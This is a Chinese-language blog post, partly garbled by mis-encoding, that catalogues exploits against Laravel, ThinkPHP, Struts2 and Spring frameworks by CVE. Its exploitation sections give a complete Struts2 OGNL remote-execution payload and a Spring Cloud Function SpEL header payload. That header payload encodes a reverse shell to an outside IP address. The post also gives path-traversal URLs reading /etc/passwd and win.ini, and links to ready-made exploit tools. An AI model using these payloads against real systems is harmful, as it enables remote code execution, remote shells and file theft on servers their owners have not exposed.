PHP框架

laravel

Laravel是一套簡(jiǎn)潔、開源的PHP Web開發(fā)框架，旨在實(shí)現(xiàn)Web軟件的MVC架構(gòu)。

特征：

CVE-2021-3129

Laravel開啟了Debug模式時(shí)，由于Laravel自帶的Ignition 組件對(duì)file_get_contents()和file_put_contents()函數(shù)的不安全使用，攻擊者可以通過(guò)發(fā)起惡意請(qǐng)求，構(gòu)造惡意Log文件等方式觸發(fā)php反序列化，最終造成遠(yuǎn)程代碼執(zhí)行。

版本影響范圍：Laravel?<= 8.4.2

工具：https://github.com/zhzyker/CVE-2021-3129

?thinkphp

特征：

查看數(shù)據(jù)包

?查看icon圖標(biāo)

查看頁(yè)面報(bào)錯(cuò)信息：

?CVE-2018-1002015

對(duì)于6以下的版本，我們可以直接使用工具檢測(cè)是否存在漏洞。（狐貍工具箱）

利用：

?

?

?對(duì)于6的版本存在一個(gè)lang 命令執(zhí)行漏洞。但沒(méi)有現(xiàn)成工具利用，需要我們直接構(gòu)造數(shù)據(jù)包發(fā)送。

JAVA框架

struts2

特征識(shí)別：訪問(wèn)url中通常是.action

CVE-2020-17530

Struts2是一個(gè)基于MVC設(shè)計(jì)模式的Web應(yīng)用框架，它本質(zhì)上相當(dāng)于一個(gè)servlet，在MVC設(shè)計(jì)模式中，Struts2作為控制器(Controller)來(lái)建立模型與視圖的數(shù)據(jù)交互。 在特定的環(huán)境下，遠(yuǎn)程攻擊者通過(guò)構(gòu)造 惡意的OGNL表達(dá)式 ,可造成 任意代碼執(zhí)行。

利用：

?工具：https://github.com/YanMu2020/s2-062

CVE-2021-31805

版本范圍：Apache?Struts?2.0.0 - 2.5.29

利用：以POST形式發(fā)送數(shù)據(jù)（其中要對(duì)執(zhí)行的命令base64編碼，然后url編碼）

Post： /s2_062/index.action
name=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b
(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b
(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,%61%57%51%3d}|{base64,-d}|{bash,-i}'}))

?

?

springboot

CVE-2021-21234

Spring Boot是由Pivotal團(tuán)隊(duì)提供的全新框架，其設(shè)計(jì)目的是用來(lái)簡(jiǎn)化新Spring應(yīng)用的初始搭建以及開發(fā)過(guò)程。該框架使用了特定的方式來(lái)進(jìn)行配置，從而使開發(fā)人員不再需要定義樣板化的配置。通過(guò)這種方式，Spring Boot致力于在蓬勃發(fā)展的快速應(yīng)用開發(fā)領(lǐng)域(rapid application development)成為領(lǐng)導(dǎo)者。
spring-boot-actuator-logview 在一個(gè)庫(kù)中添加了一個(gè)簡(jiǎn)單的日志文件查看器作為 spring boot 執(zhí)行器端點(diǎn)。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目錄遍歷漏洞。該庫(kù)的本質(zhì)是通過(guò) admin（spring boot 執(zhí)行器）HTTP 端點(diǎn)公開日志文件目錄。要查看的文件名和基本文件夾（相對(duì)于日志文件夾根）都可以通過(guò)請(qǐng)求參數(shù)指定。雖然檢查了文件名參數(shù)以防止目錄遍歷攻擊（因此`filename=../somefile` 將不起作用），但沒(méi)有充分檢查基本文件夾參數(shù)，因此`filename=somefile&base=../` 可以訪問(wèn)日志記錄基目錄之外的文件）。該漏洞已在 0.2.13 版中修復(fù)。0.2.12 的任何用戶都應(yīng)該能夠毫無(wú)問(wèn)題地進(jìn)行更新，因?yàn)樵摪姹局袥](méi)有其他更改。除了更新或刪除依賴項(xiàng)之外，沒(méi)有解決此漏洞的方法。但是，刪除運(yùn)行應(yīng)用程序的用戶對(duì)運(yùn)行應(yīng)用程序不需要的任何目錄的讀取訪問(wèn)權(quán)限可以限制影響。此外，可以通過(guò)在反向代理后面部署應(yīng)用程序來(lái)限制對(duì) logview 端點(diǎn)的訪問(wèn)。

POC:

http://目標(biāo)/manage/log/view?filename=etc/passwd&base=../../../../../../

http://目標(biāo)/manage/log/view?filename=/windows/win.ini&base=../../../../../../../

?Spring Cloud Function SPEL 遠(yuǎn)程代碼執(zhí)行

Spring Cloud Function 是基于Spring Boot 的函數(shù)計(jì)算框架，它抽象出所有傳輸細(xì)節(jié)和基礎(chǔ)架構(gòu)，允許開發(fā)人員保留所有熟悉的工具和流程，并專注于業(yè)務(wù)邏輯。 由于Spring Cloud Function中RoutingFunction類的apply方法將請(qǐng)求頭中的“spring.cloud.function.routing-expression”參數(shù)作為Spel表達(dá)式進(jìn)行處理，造成了Spel表達(dá)式注入漏洞，未經(jīng)授權(quán)的遠(yuǎn)程攻擊者可利用該漏洞執(zhí)行任意代碼。?

影響版本：3.0.0.RELEASE <=?Spring?Cloud?Function <= 3.2.2

利用：

POST：/functionRouter

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash?-c?{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")

注意以post形式必須提交數(shù)據(jù)

?

?

CVE-2022-22965

Spring?Framework遠(yuǎn)程代碼執(zhí)行漏洞

Spring core是Spring系列產(chǎn)品中用來(lái)負(fù)責(zé)發(fā)現(xiàn)、創(chuàng)建并處理bean之間的關(guān)系的一個(gè)工具包，是一個(gè)包含Spring框架基本的核心工具包，Spring其他組件都要使用到這個(gè)包。 未經(jīng)身份驗(yàn)證的攻擊者可以使用此漏洞進(jìn)行遠(yuǎn)程任意代碼執(zhí)行。 該漏洞廣泛存在于Spring 框架以及衍生的框架中，并JDK 9.0及以上版本會(huì)受到影響。

利用：

工具：https : //github.com/BobTheShoplifter/Spring4Shell-PoC

CVE-2022-22947

Spring?Cloud?Gateway是Spring中的一個(gè) API 網(wǎng)關(guān)

影響版本：

Spring?Cloud?Gateway?3.1.x?< 3.1.1

Spring?Cloud?Gateway?3.0.x?< 3.0.7

參考文章：Spring Cloud Gateway遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2022-22947）-騰訊云開發(fā)者社區(qū)-騰訊云

綜合利用工具：文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-851290.html

https : //github.com/0x727/SpringBootExploit

到了這里，關(guān)于框架安全（Laravel、thinkphp、struts2、springboot）的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！